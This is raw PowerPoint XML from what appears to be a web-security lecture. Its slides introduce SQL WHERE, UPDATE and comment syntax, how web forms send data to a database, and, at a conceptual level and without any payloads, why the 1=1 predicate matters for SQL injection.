    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="506055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a:t>SQL Tutorial:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where clause</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="944563"/>
            <a:ext cx="7889358" cy="3531744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t>It is uncommon for a SQL query to retrieve all records in a database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t>WHERE clause is used to set conditions for several types of SQL statements including SELECT, UPDATE, DELETE etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t>The above SQL statement only reflects the rows for which the predicate in the WHERE clause is TRUE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t>The predicate is a logical expression; multiple predicates can be combined using keywords AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" err="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t> OR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0"/>
              <a:t>Lets look at an example in the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167727EC-34A7-46D3-B216-E1558E79458E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="21623" t="58030" r="60479" b="38182"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333255" y="1919840"/>
            <a:ext cx="3240410" cy="428626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1930491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a:t>SQL Tutorial: WHERE Clause</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first query returns a record that has EID5001 in EID field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second query returns the records that satisfy either EID=‘EID5001’ or Name=‘David’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA853BB4-256B-4194-BAF0-0E26449D4196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="21528" t="27273" r="33870" b="43485"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1686718" y="1914951"/>
            <a:ext cx="6100763" cy="2499887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122932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a:t>SQL Tutorial: WHERE Clause</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874635" y="1026529"/>
            <a:ext cx="7645400" cy="3513573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the condition is always True, then all the rows are affected by the SQL statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This 1=1 predicate looks quite useless in real queries, but it will become useful in SQL Injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A02A2FA-9F4F-4A68-8FED-5667A395E0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="21528" t="59848" r="37023" b="21970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165071" y="1709938"/>
            <a:ext cx="7064529" cy="1936770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180577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DD84E-C266-6240-8495-051B5DA30291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious web content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25870469-86EC-ED4F-A070-6AC9009775BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Drive-by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101360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a:t>SQL Tutorial: UPDATE Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use the UPDATE Statement to modify an existing record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{262956C9-D6F9-4A6C-95D3-6D35C71B8B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="32513" t="35837" r="28392" b="49999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="225542" y="1643991"/>
            <a:ext cx="8438915" cy="1904730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2672499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a:t>SQL Tutorial: Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL supports three comment styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text from the # character to the end of line is treated as a comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text from the “--” to the end of line is treated as a comment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to C language, text between /* and */ is treated as a comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0F8D46-778B-4D83-B870-0AE3B9DF792A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="32418" t="34697" r="25631" b="59243"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="387013" y="2757451"/>
            <a:ext cx="8468835" cy="764682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3771628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AEE1D1F-2D54-3D45-965E-5D84F56584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70A6FC-158B-1E4E-9259-66B701C740D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before the demo...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s talk about how it works.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2573556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sz="2800" dirty="0"/>
              <a:t>Interacting with Database in Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1136474"/>
            <a:ext cx="7645400" cy="3582281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>A typical web application consists of three major components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>SQL Injection attacks can cause damage to the database. As we notice in the figure, the users do not directly interact with the database but through a web server. If this channel is not implemented properly, malicious users can attack the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7349DB87-EBA0-4927-8E1A-53380C2F7C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="34122" t="45151" r="23927" b="32273"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502368" y="1582016"/>
            <a:ext cx="5885264" cy="1979468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808754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a:t>Getting Data from User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This example shows a form where users can type their data. Once the submit button is clicked, an HTTP request will be sent out with the data attached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HTML source of the above form is given below: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request generated is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{637881C0-6001-4EC8-B5BB-F4533A323A03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="34688" t="39630" r="37812" b="49999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335354" y="1606619"/>
            <a:ext cx="4041101" cy="857203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287951D9-75AC-4ED5-9A10-94786BD57045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="34687" t="52778" r="26250" b="37037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541691" y="2679679"/>
            <a:ext cx="6580439" cy="965131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{683C9B72-5060-4E67-952E-9CC93C97356A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="35521" t="66330" r="25833" b="32222"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067444" y="4040218"/>
            <a:ext cx="7528932" cy="158719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838035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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Web Application server Interact with Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1260652"/>
            <a:ext cx="7645400" cy="3303587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct the query string and then send it to the database for execution.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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72189232-D61E-46D8-9739-7BE267583AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="25000" t="34075" r="35833" b="23333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455631" y="1484714"/>
            <a:ext cx="5643941" cy="3452411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F17FCE9-5C7E-2443-9049-4C10749C2CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362951" y="2446232"/>
            <a:ext cx="5829300" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
